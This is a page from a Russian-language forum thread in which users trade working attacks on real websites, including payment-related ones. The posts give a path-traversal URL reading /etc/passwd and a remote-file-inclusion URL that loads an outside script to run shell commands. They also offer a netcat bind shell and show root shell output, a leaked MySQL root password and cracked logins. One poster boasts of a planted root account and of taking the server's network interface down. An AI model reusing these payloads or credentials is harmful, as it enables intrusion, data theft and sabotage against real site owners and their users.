Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 ... 7 След.
RSS
Дыры на сайте платежной системы Cyberplat
 
Цитата
Олечка пишет:
Цитата
dimanius пишет:
Я девчёнкой, которую в первый(и наверное последний) раз в жизни вижу, тах хорошё покувыркался :))) ГЫ!
Не в последний раз ты меня видишь. Я тебя еще долго доставать буду, пока меня еще раз не трахнешь.

Дык не смешно!
 
Цитата
Олечка пишет:
Пааадумаешь Киберплат.
Я вот на сайтах сразу в двух платежных систем баги нашла

http://www.paycash.kiev.ua/cgi-bin/news/show.cgi?lng=ru&dt=../../../../../etc/passwd%00&lnk=0

http://www.bgssmartcard.com/templ/master_01.php?pp=8,1,1,0,0&get_url=http://pp66pp.narod.ru/1.php

Vot blin devochki poshli :)))
 
Цитата
Олечка пишет:

http://www.bgssmartcard.com/templ/master_01.php?pp=8,1,1,0,0&get_url=http://pp66pp.narod.ru/1.php

лучше этот скрит использовать, он более универсален:
http://www.bgssmartcard.com/templ/master_01.php?pp=8,1,1,0,0&get_url=http://abc666cba.narod.ru/Packer.php&cmd=ls -la
 
Вообщем, пользуйтесь:
nc www.bgssmartcard.com 32767
(бинд-шелл на 32767 порту поднял)

если кто получит НСД с более высокими привилегиями, пишите в форум.
 
Ой, обознался: НСД с привилегиями root'a там получить легко, можно и не обсуждать.
 
не, вы не умеете! :) во как надо.

[root@mandrake /root]# zoh www.bgssmartcard.com
Trying 194.152.178.48...
Connected to morpheus.netkey.at.
Escape character is '^]'.
bash-2.05# id
uid=0(root) gid=0(root) groups=4294967295,98(nobody)
 
специальный скрипт - зохакер.
 
Цитата
buggzy пишет:
специальный скрипт - зохакер.
А вот и он:      :)))

http://forum.securitylab.ru/forum_posts.asp?TID=1811&PN=4
 
не, это другой зохакер :)
 
Na http://www.bgssmartcard.com parol k  phpMyAdmin xostera sledushiy:
$cfgServers[1]['user']          = 'root';      // MySQL user
$cfgServers[1]['password']      = '386297710';

Mojno poprobovat dlia roota, mojet takoi je ;=))
 
а нафиг, рут и так есть... там система необновленная хрен знает сколько
 
несколько л\п:

ecr              (ecr)
upload           (upload)
gaby             (gaby)
 
Dyk eto, ty chego xochesh provernut, massovyi Deface ili tak  prosto pokapatsia?
 
Нафиг дефейс, интересней дамп MySQL-базы сделать и на досуге покапаться в ней.
 
Ok, davai. Vas tam vrode dvoe "nobody" s shellom rabotaiut. Ne budu meshat, udachi ;)
 
Эээ, кина не будет %)
ifconfig eth0 down сделал %)))
а ifconfig eth0 up не сработал %))))
Сорри кого обломал %)
 
а ты просто ifconfig делал? интересно что за железо
 
А вы никогда не задумывались зачем вам вообще ламать эти сайты? Вы хотите прибавить лишнево гемора начальнику? а вы знаете сколько гемору админ получит? а вэб программер? Да темболее нифига вы не взломали... интерфейс только деактивировали :)) хм... с этого толку маловато
 
Хе-хе, мил человек. Как раз было всё сломано, так как ifconfig можно запускать кем угодно, но вот изменения может делать только root, так что считайте что хостинг был убит. Я себе даже там рутовый аккаунт оставил до лучших времён. Так что наоборот согласно твоим словам геморроя начальству не будет и админу итд %), так как все хостящиеся у них сайты остались целы. Насколько я успел там порыться - нихрена не настроено, давно ничего не обновлялось, скорее всего админ даже и не поймёт что случилось :). А там уже табуны бегают по его системе :). Насчёт железа тамошнего - 2-х процевый P3 помоему с гигом оперативки + дискового пространства гигов на 300. Зачем же такую прелесть губить, на ней можно хороший полигон собрать чего-либо %)).
 
> ifconfig eth0 down сделал %)))

гат! :(
Страницы: Пред. 1 2 3 4 5 ... 7 След.
Читают тему